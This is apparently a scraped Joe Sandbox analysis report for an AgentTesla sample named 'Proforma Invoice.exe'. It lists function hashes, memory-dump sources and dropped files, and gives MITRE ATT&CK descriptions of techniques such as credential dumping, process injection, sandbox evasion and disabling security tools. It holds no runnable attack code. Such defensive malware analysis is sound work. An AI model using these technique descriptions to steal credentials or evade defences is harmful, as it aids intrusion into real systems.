API String ID:
Opcode ID: af69f3ffff4a970b60c57f5f8efad19a92ac2dcb039e41c5b5fe9376a6b283c4
Instruction ID: abd263cf6b3e1ca7f339c951c946a22b2389ca41124a08242d80069613af6649
Opcode Fuzzy Hash: af69f3ffff4a970b60c57f5f8efad19a92ac2dcb039e41c5b5fe9376a6b283c4
Instruction Fuzzy Hash: E611A131B101259FDF64A668CC14AEE73EBABC8310B004139D40AEB344DF75DC428BD2

Uniqueness

Uniqueness Score: -1.00%

Function 066B4203 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.4104588284.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_66b0000_VoAlKljQu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a2769d5e31c0a45823c49ddb5183016eb4ed9858cbaa7cbff916a37b861fa5e7
Instruction ID: e4f359f811c3f55a2336d0488c1c8379a5e633121a9b6ae97d51433155b9c73e
Opcode Fuzzy Hash: a2769d5e31c0a45823c49ddb5183016eb4ed9858cbaa7cbff916a37b861fa5e7
Instruction Fuzzy Hash: 4801D431B004104FDB6586BDE5547ABA7DBDBCA710F14843AE10ACB34ADE31CC424395

Uniqueness

Uniqueness Score: -1.00%

Function 066BA319 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.4104588284.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_66b0000_VoAlKljQu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cdde5376417c6cd9fd60891da523c97094eb0f550e3416fff1b29c96acc71a9f
Instruction ID: c6cfb43cd14784e292b783431732ff82d048f4a6bf93322225b708e927a34535
Opcode Fuzzy Hash: cdde5376417c6cd9fd60891da523c97094eb0f550e3416fff1b29c96acc71a9f
Instruction Fuzzy Hash: 3101D430B146118FDB71EABDE52075EB7E6EB8A714F24983EE14AC7351EA21DC428391

Uniqueness

Uniqueness Score: -1.00%

Function 066B3886 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.4104588284.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_66b0000_VoAlKljQu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c05b41c9520fb4f3d6bc4d7e8ec8643d4ae13885482297bced0ad1f7f6a8ab1f
Instruction ID: 17000b3b149030182df376f52dc1f2cd502909d0627a81c6895cf84d4ac21b87
Opcode Fuzzy Hash: c05b41c9520fb4f3d6bc4d7e8ec8643d4ae13885482297bced0ad1f7f6a8ab1f
Instruction Fuzzy Hash: B821BFB5901259AFCB10DF9AD884ADEFBB4BB48314F10812AE918A7310D774A554CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 066BF191 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.4104588284.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_66b0000_VoAlKljQu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cb549a84c3502bcf8ce3e8e3f7d9c4dacacbd9430272d7268737de438fa25378
Instruction ID: 90000a4c0e8947103f9dd596a918a7a78ac12a9318bf6c1ff94e0703184bad06
Opcode Fuzzy Hash: cb549a84c3502bcf8ce3e8e3f7d9c4dacacbd9430272d7268737de438fa25378
Instruction Fuzzy Hash: 8C01D435B401508FCB61D66CE854B6B77E6EBC9724F188829E50ACB355DE31DC424385

Uniqueness

Uniqueness Score: -1.00%

Function 066B3FB7 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.4104588284.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_66b0000_VoAlKljQu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f20a0ef768a52d03d1eb739782eb06ee7842935b1a522c8a62c074d43bba0b4
Instruction ID: 45d65e99afdc37d843827fa38493181377695a30cf72011b118885cf18459aa3
Opcode Fuzzy Hash: 3f20a0ef768a52d03d1eb739782eb06ee7842935b1a522c8a62c074d43bba0b4
Instruction Fuzzy Hash: 5901D436B141259FDB649A69CC50BEF73EBEBC8310F00053AD50AE7344EE609C4287D2

Uniqueness

Uniqueness Score: -1.00%

Function 066B3888 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.4104588284.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_66b0000_VoAlKljQu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a75f0008c3e148f4420d82574bf4e21cc6cbcfa056289fea4f4ea85e4a4722b
Instruction ID: 0c1bc17f621cddd61570874c9efa834d8463d439b0621982af4af51958211c6a
Opcode Fuzzy Hash: 4a75f0008c3e148f4420d82574bf4e21cc6cbcfa056289fea4f4ea85e4a4722b
Instruction Fuzzy Hash: 2411C0B5D01259ABCB10DF9AD884ADEFBB4BB48314F10812AE918B7310D774A554CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 066B4210 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.4104588284.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_66b0000_VoAlKljQu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ababeea954ba1b9697429e692dec5b77506a057568153bb85042fdf012e3177
Instruction ID: 9119de038f09b0fe83af0b21773232c8969343d8fb8138347b200b41a34121d0
Opcode Fuzzy Hash: 9ababeea954ba1b9697429e692dec5b77506a057568153bb85042fdf012e3177
Instruction Fuzzy Hash: DE01D131B000104BDB6495ADE40076FA3DBDBC9720F10943AE10EC734AEE31DC824395

Uniqueness

Uniqueness Score: -1.00%

Function 066BF1A0 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.4104588284.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_66b0000_VoAlKljQu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1424e436854b3fc45d35f00b37a68b94f5d5310fb87065603ad4916e5bca0572
Instruction ID: 96253b517edf753b69c3b0b186cf671b5b0e6dcf5539109e5e92321fc47916be
Opcode Fuzzy Hash: 1424e436854b3fc45d35f00b37a68b94f5d5310fb87065603ad4916e5bca0572
Instruction Fuzzy Hash: FA01DC35B001104FCB6495ADE850B6FA2EAEBC9720F148839E50AC7350EE21DC434385

Uniqueness

Uniqueness Score: -1.00%

Function 066BA328 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.4104588284.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_66b0000_VoAlKljQu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0debdfbf67ea388e1626d3cc72a52fe5bf0631767b42d3b9165918b8534e373
Instruction ID: 51ad710b676a5a743d5e2207ff42034ce7f3a8c9e816116d11dad6d3b43278dc
Opcode Fuzzy Hash: a0debdfbf67ea388e1626d3cc72a52fe5bf0631767b42d3b9165918b8534e373
Instruction Fuzzy Hash: 1E018C30B205109FCB70EAADE550B6EB3D7EB8A714F109828E10EC7344EE22EC428381

Uniqueness

Uniqueness Score: -1.00%

Function 066BFEF0 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.4104588284.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_66b0000_VoAlKljQu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e423b39b00d93b32426a3a536b8b1e8db2eb144f828335cde63478e0acaf9dbe
Instruction ID: 2cd03857d4467b46385fa5e7f62e94f58c19e6320efc04a79f8389d57bb7de31
Opcode Fuzzy Hash: e423b39b00d93b32426a3a536b8b1e8db2eb144f828335cde63478e0acaf9dbe
Instruction Fuzzy Hash: B0F08970A012058FD390EFBCD50025D7BE6BB89204F104179C509C3354EF30D942CB91

Uniqueness

Uniqueness Score: -1.00%

Function 066B6469 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.4104588284.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_66b0000_VoAlKljQu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2db8c9b88436ff4a91c82a09e185db0fcd0d3f62fd481596937e0e497339367c
Instruction ID: f8c4e9bbda00b64c3c09770a3c00bf9a654cdf989d1a01acc47b7a9aedccd740
Opcode Fuzzy Hash: 2db8c9b88436ff4a91c82a09e185db0fcd0d3f62fd481596937e0e497339367c
Instruction Fuzzy Hash: 34F09B71E14644EFEF60CFB4C9657997BE9EB42304F2088BAD444C7242E276D980C791

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 066B7698 Relevance: 13.0, Strings: 10, Instructions: 477COMMON

Download Yara Rule

Strings

$^q, xrefs: 066B77E0
$^q, xrefs: 066B7C1B
$^q, xrefs: 066B7C25
$^q, xrefs: 066B77D4
$^q, xrefs: 066B77AF
$^q, xrefs: 066B7C0F
$^q, xrefs: 066B7B7D
$^q, xrefs: 066B7C31
$^q, xrefs: 066B77A3
$^q, xrefs: 066B7B71

Memory Dump Source

Source File: 0000000D.00000002.4104588284.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_66b0000_VoAlKljQu.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-2222239885
Opcode ID: 0b0b69347a1f07008b2a31b28c6dd8a8c768057d08af778c5df758ece420ad09
Instruction ID: 1019aba285fc1f35010ab1f5abc07fcbb0fa5260e9aa6bf67a274ccc3aa0bc27
Opcode Fuzzy Hash: 0b0b69347a1f07008b2a31b28c6dd8a8c768057d08af778c5df758ece420ad09
Instruction Fuzzy Hash: D8121B30B00219CFDB68DF65D854AAEBBB6BFC4304F2495A9D409AB355DB30DD86CB81

Uniqueness

Uniqueness Score: -1.00%

Function 066BA948 Relevance: 10.2, Strings: 8, Instructions: 229COMMON

Download Yara Rule

Strings

$^q, xrefs: 066BAAA5
$^q, xrefs: 066BAA3E
$^q, xrefs: 066BAA4A
$^q, xrefs: 066BAAD0
$^q, xrefs: 066BAB06
$^q, xrefs: 066BAA99
$^q, xrefs: 066BAAFA
$^q, xrefs: 066BAAC4

Memory Dump Source

Source File: 0000000D.00000002.4104588284.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_66b0000_VoAlKljQu.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-3823777903
Opcode ID: feac21bc51e70cbaa4ee843d089b4e111b80112822c13042d94cdc49331330fc
Instruction ID: 1326bc7ff693a61ba036648bca8c12b1b10157f63d47e1e61672e8ca6643c766
Opcode Fuzzy Hash: feac21bc51e70cbaa4ee843d089b4e111b80112822c13042d94cdc49331330fc
Instruction Fuzzy Hash: A6915D30E10209DFDB68DFA5D644BAEB7F6EF84700F109529E4019B358DB759D85CB90

Uniqueness

Uniqueness Score: -1.00%

Function 066B7098 Relevance: 9.2, Strings: 7, Instructions: 405COMMON

Download Yara Rule

Strings

$^q, xrefs: 066B737A
$^q, xrefs: 066B73E0
$^q, xrefs: 066B7534
$^q, xrefs: 066B73D4
$^q, xrefs: 066B75AC
$^q, xrefs: 066B75A0
.5vq, xrefs: 066B70F3

Memory Dump Source

Source File: 0000000D.00000002.4104588284.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_66b0000_VoAlKljQu.jbxd

Similarity

API ID:
String ID: .5vq$$^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-390881366
Opcode ID: 3200cabe0cc344097ccbb60bbcc0d731d55a7e19566f0f224c6d84b31a55bb7b
Instruction ID: 7fe3ea49698df527fb4957dc0b602549ae3cd8eeb1c1e55aaa9823adfa6dc814
Opcode Fuzzy Hash: 3200cabe0cc344097ccbb60bbcc0d731d55a7e19566f0f224c6d84b31a55bb7b
Instruction Fuzzy Hash: D4F12D30B11209CFDB69EF69D594AAEBBB6BFD4300F248528D4059B358DB35EC86CB50

Uniqueness

Uniqueness Score: -1.00%

Function 066BBA13 Relevance: 7.7, Strings: 6, Instructions: 195COMMON

Download Yara Rule

Strings

$^q, xrefs: 066BBC11
$^q, xrefs: 066BBBDD
$^q, xrefs: 066BBC1D
$^q, xrefs: 066BBBE9
$^q, xrefs: 066BBBA9
$^q, xrefs: 066BBBB5

Memory Dump Source

Source File: 0000000D.00000002.4104588284.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_66b0000_VoAlKljQu.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-2392861976
Opcode ID: a411eeb959bc5058382bc9a45a2a11bf15e66da889ae2428f6d1af46524dbf13
Instruction ID: 4b3d27c3878925cae02ca1d5bdbf7d73750b225c39976c820d329fc873efaed4
Opcode Fuzzy Hash: a411eeb959bc5058382bc9a45a2a11bf15e66da889ae2428f6d1af46524dbf13
Instruction Fuzzy Hash: BE618A31E0021ACFDBA8DF68D5846ADB7A2FF84700B209969D406DB358DF71DD86CB81

Uniqueness

Uniqueness Score: -1.00%

Function 066B83E8 Relevance: 5.3, Strings: 4, Instructions: 282COMMON

Download Yara Rule

Strings

$^q, xrefs: 066B864E
$^q, xrefs: 066B86A7
$^q, xrefs: 066B8642
$^q, xrefs: 066B86B3

Memory Dump Source

Source File: 0000000D.00000002.4104588284.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_66b0000_VoAlKljQu.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q
API String ID: 0-2125118731
Opcode ID: ad8dd7af96aaf772979f2be4e51b65d5e72fe1ea9697aff59474890c89f822ac
Instruction ID: e6b390c44a4da97c6d3a08921cffb5d0f7506154089ed0708aa3fc3cccd7f70d
Opcode Fuzzy Hash: ad8dd7af96aaf772979f2be4e51b65d5e72fe1ea9697aff59474890c89f822ac
Instruction Fuzzy Hash: 7AB13A30A11209CFDB68EF69D59069EB7BAEF84304F24982DD405DB355DB75EC86CB80

Uniqueness

Uniqueness Score: -1.00%

Function 066B8800 Relevance: 5.2, Strings: 4, Instructions: 168COMMON

Download Yara Rule

Strings

$^q, xrefs: 066B887F
LR^q, xrefs: 066B8942
LR^q, xrefs: 066B88F3
$^q, xrefs: 066B888B

Memory Dump Source

Source File: 0000000D.00000002.4104588284.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_66b0000_VoAlKljQu.jbxd

Similarity

API ID:
String ID: LR^q$LR^q$$^q$$^q
API String ID: 0-2454687669
Opcode ID: 5444acbdccad916bd08f9c0812a814816834ea935a2d8c5c1c7beae1ef9fccc2
Instruction ID: 0b4af4254aed558d6206eff8c6c280ce4a7e281423e9b45e3782111988f904dc
Opcode Fuzzy Hash: 5444acbdccad916bd08f9c0812a814816834ea935a2d8c5c1c7beae1ef9fccc2
Instruction Fuzzy Hash: AA51B430B10205DFDB68EB28D940AAAB7EAFF88704F14956DE405DB395DB31EC85CB91

Uniqueness

Uniqueness Score: -1.00%

Function 066BACD0 Relevance: 5.2, Strings: 4, Instructions: 164COMMON

Download Yara Rule

Strings

$^q, xrefs: 066BAEAC
$^q, xrefs: 066BAE01
$^q, xrefs: 066BAE83
$^q, xrefs: 066BAE54

Memory Dump Source

Source File: 0000000D.00000002.4104588284.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_66b0000_VoAlKljQu.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q
API String ID: 0-2125118731
Opcode ID: 3e840cf468e84d1c546fc7c4572d044d192ee86f79bebdad508b5c8b886f44e8
Instruction ID: 9092b10840552a1886e27deb13f8a9b7bd801fb115ace611799fbf7849790da2
Opcode Fuzzy Hash: 3e840cf468e84d1c546fc7c4572d044d192ee86f79bebdad508b5c8b886f44e8
Instruction Fuzzy Hash: E3518E30E10245DFDF65DBA8E5906EEB7B2EB84310F24992AD805DB355DB31DC82CB91

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Proforma Invoice.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Agenttesla

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Persistence and Installation Behavior

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Proforma Invoice.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\VoAlKljQu.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_21qvef1k.kab.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jojjulcy.ejo.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_k1ltnulj.opo.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ntgtiuiq.4me.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ny0bxjpr.nxg.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_olmghyzu.30z.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tvg1abqw.m3v.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ygndzoki.ccv.ps1

Windows Analysis Report
Proforma Invoice.exe

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

